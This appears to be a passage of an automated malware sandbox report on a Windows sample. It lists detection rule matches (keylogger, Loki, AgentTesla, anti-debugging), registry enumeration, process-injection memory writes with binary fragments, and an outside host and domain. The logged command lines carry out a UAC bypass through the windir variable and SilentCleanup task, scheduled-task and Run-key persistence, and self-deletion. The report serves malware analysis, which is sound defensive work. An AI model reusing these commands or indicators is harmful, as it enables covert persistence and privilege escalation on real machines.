description Communications over RAW Socket rule Network_TCP_Socket
description Communications over HTTP rule Network_HTTP
description Win32 PWS Loki rule Win32_PWS_Loki_Zero
description Run a KeyLogger rule KeyLogger
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Run a KeyLogger rule KeyLogger
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description Run a KeyLogger rule KeyLogger
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000640
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x80000002
key_handle: 0x00000634
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00020019
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
2 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2112
process_handle: 0x000004fc
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2112
process_handle: 0x000004fc
1 0 0
cmdline reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline reg delete hkcu\Environment /v windir /f
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline schtasks.exe /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
host 34.88.140.135
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2524
region_size: 598016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004ec
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f0
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 1188
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3056
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000394
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2408
region_size: 212992
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b0
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b0
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1920
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b0
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Xypgtv reg_value C:\Users\Public\vtgpyX.url
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.py
file C:\Python27\agent.pyw
file C:\Users\test22\AppData\LocalLow\iK0eK1lK3k\agent.pyw
Process injection Process 260 manipulating memory of non-child process 2112
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f0
3221225496 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌNäˆ/ŠOˆ/ŠOˆ/ŠOÓG‰N™/ŠOÓGN4/ŠOÓGN‰/ŠO]BŽN›/ŠO]B‰N/ŠO]BNÚ/ŠOÓGŽN‘/ŠOÓGŒN‰/ŠOÓG‹N“/ŠOˆ/‹Ox/ŠOAƒN‡/ŠOAˆN‰/ŠORichˆ/ŠOPELIJW`à Žt[Ü @ @ÐBÀL[Ø8HØ@ ¤.text}ŒŽ `.rdataP¸ º’@@.data\`LL@À.relocL[À\˜@B
base_address: 0x00400000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ ˜$„¦°@@Оà\CODE°–˜ `DATAl°œ@ÀBSSÅÀ¤À.idatažÐ¤@À.reloc\à¬@PÄ@P
base_address: 0x00400000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: @2‹À@@@\@ì @l$@ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáãäå@Error‹ÀRuntime error at 00000000‹À0123456789ABCDEFÿÿÿÿàO@‹À‹À@@J7<äºÏ¿}ªiFîµä[Jú-EœÝ]³QçëqØ'ÓØ'ÓØ'ÖØ7nØ$ÓsØ$ÓsØ$nsØ7ÓsØ7ÖsØ$ÓØ7Ø7ÖØ7ÖsØ$ÓØ$nsØ$nsØ7Ø$ÓØ$nsØ$nsØ7ÖsØ$ÓsØÔØ'ØØsØXØ$ÓØ'ÖØqØ'ÖؖáveÛe3ôs>v÷†E±Yêá)­Vû˜Ar5d2Š'òÂØMY‰ pê5ù©ñÌ-þ+~•R¶Ö”æÐvMºoß3 v§·5v…ÅÞƒ¸`‡6©¤á þáx.¢WŽ‹ï)b!ò²jíïz´Ì·|X—¸q/Õæ?dEzãîs£‹3Ãhp>4Ǝ7èˆJ|—úðØèëá¾iAò¡úèÌ3áHþ‰‡ˆíG\†rgã@À Œ¥[\ë¸?áRÃénS ÑÒ-´¼;ÐÍñ[MQ¶SEvr]‚`„U¥’ÝêŽ(èú†mü'~àÖ.‘ÚÅÂÅÈ3Â%G°’j°Uî½S:Ì¦æä[½V€¿v™z½åÁL}¸<ÿ,9ŠÞýžV_‹ƒ:Â9 ‘牽˜W‡ù™ÙÔەoŸSûËۓ`Qé6ñ¡àw—Ëm¥Anm'o-”°aÃе1ä¨ 5[þ'Çè ©Ð¦¿q ¤ÞÆ +ºê$›gÌ7¶G~Ø: ðDºÜÑk½´úÓæ`¸{ÈQÖÎ*<A…æ>5²+X2`*ÿ0e¢÷¼Aâ@ŽPD„%ÌÐÒ:¨»eŠfk®Z‹¨ÃÌPÒÕ*”cÕéN{» “¨¤…¦b«?O±óÝ0ZR‡ÔžèÌÚÃOË©¤×`TwR\ŽÀàÄËÃÐÃsS¦@O±j¹ ›}¢ì J˜g_ÍYljò‘ ˜@Ž'”¸…PÂZ°)zˆãp>cƒŒXgǼ|½\ÏODn…á)ü7Lôû8ažŒ³Ô´:3ªÆô딛¥ø‘GgPnº1½·Õ“Ô^)õ/2{ۘ¸<T¾i#©È7ný_Fû^îˆnB!ôëäRÛc-dèmàÇ«>WÆÄN䨂«$há:_p”$Öd^}QÏ ˜kï8áeÏÌË%VŒ¿âFNØ\ðø•G;æ1Èy¤SÇ,•„°!#fñŽ‰Äþ j®Þ Ø|íälçÇ+Æڏ E—Å Å$ŒÜ›¶Dë Í!kù,ú"dlQ(° ÇMIÎ,p#°)]”ÕÙ9i-0‚àl&‘®ª!YіoPÝ+¾‡9•}\±¡©Ù.¿4#D.•§×è¼R I±£ç— 1ÔTû_v¿tÂmÿóJQ÷Ð\pk+Fæ*_h:÷Ù ‡æÄ £ 8 c+-’û2_öš0ýcQò¸ dt‰µ+ûÞ™¸¦åð‰#t êqêR(PY» ïÀ(¢#ÓϘÆ”ÌzÓ ¯N$ÇAÇAôÆApÇA¤ÆA„ÇA@ÇAhÇAlÆA,ÇA¼ÆAÇA°ÆAÆAÄÆA´°A”ÇAÇAˆÇA(ÈA\ÇAüÆA4ÇA|ÆAŒÆAìÆA ÇA<ÇA¸°AèÆA¤ÇA°°AÀÆAŒÇA¸ÆAdÆA°ÇAðÆA ÇA´ÆA(ÇAÈÇAØ°A¼°A˜ÆA ÇAÇAÇAœÆA ÆA8ÇA¬ÆAPÇA¬ÇAˆÆALÇAøÆAÌÆADÇA`ÇA¬°A ÈA¨ÇA˜ÇAÇAÈÆA€ÆAœÇA”ÆA0ÇAhÆAHÇA´ÇAveronika.ac.ug
base_address: 0x0041b000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: ,ÒÜÐ ÔHÑXÔXјÔhÑàÔxÑÕ€Ñ8ՐѺÖðÑ*× Òp× Ò:ÒRÒjÒ‚ÒžÒ¬Ò¼ÒÈÒÖÒæÒÓÓ$Ó:ÓPÓbÓtӊӜӮӼÓÊÓÖÓòÓþÓÔ,Ô>ÔLÔfÔzÔŠÔ¦Ô¶ÔÌÔîÔÕ Õ.ÕFÕRÕZÕfÕxÕˆÕ˜Õ¦Õ¶ÕÆÕØÕìÕÖÖ.ÖBÖPÖ`ÖrÖ~֌֚֮ÖÄÖÔÖäÖðÖ× ×6×B×V×^×z׊×kernel32.dllDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionVirtualFreeVirtualAllocLocalFreeLocalAllocGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdWideCharToMultiByteMultiByteToWideCharGetThreadLocaleGetStartupInfoAGetModuleFileNameAGetLocaleInfoAGetCommandLineAFreeLibraryExitProcessWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleuser32.dllGetKeyboardTypeMessageBoxACharNextAadvapi32.dllRegQueryValueExARegOpenKeyExARegCloseKeyoleaut32.dllSysFreeStringSysReAllocStringLenSysAllocStringLenkernel32.dllGetModuleHandleAadvapi32.dllRegOpenKeyExARegEnumKeyAFreeSidkernel32.dllWriteFileSleepLocalFreeLoadLibraryExWLoadLibraryAGlobalUnlockGlobalLockGetTickCountGetSystemInfoGetProcAddressGetModuleHandleAGetModuleFileNameAGetFileAttributesWGetCurrentProcessIdGetCurrentProcessFreeLibraryFindNextFileWFindFirstFileWFindCloseExitProcessDeleteFileWCreateDirectoryWCopyFileWgdi32.dllSelectObjectDeleteObjectDeleteDCCreateCompatibleDCCreateCompatibleBitmapBitBltuser32.dllReleaseDCGetSystemMetricsGetDCCharToOemBuffAole32.dllOleInitializeCoCreateInstance
base_address: 0x0041d000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ àÌlã“Ì4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.02 InternalNameStub.exe&LegalCopyright*LegalTrademarks: OriginalFilenameStub.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>
base_address: 0x0040e000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

 buffer: À 7
base_address: 0x00410000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

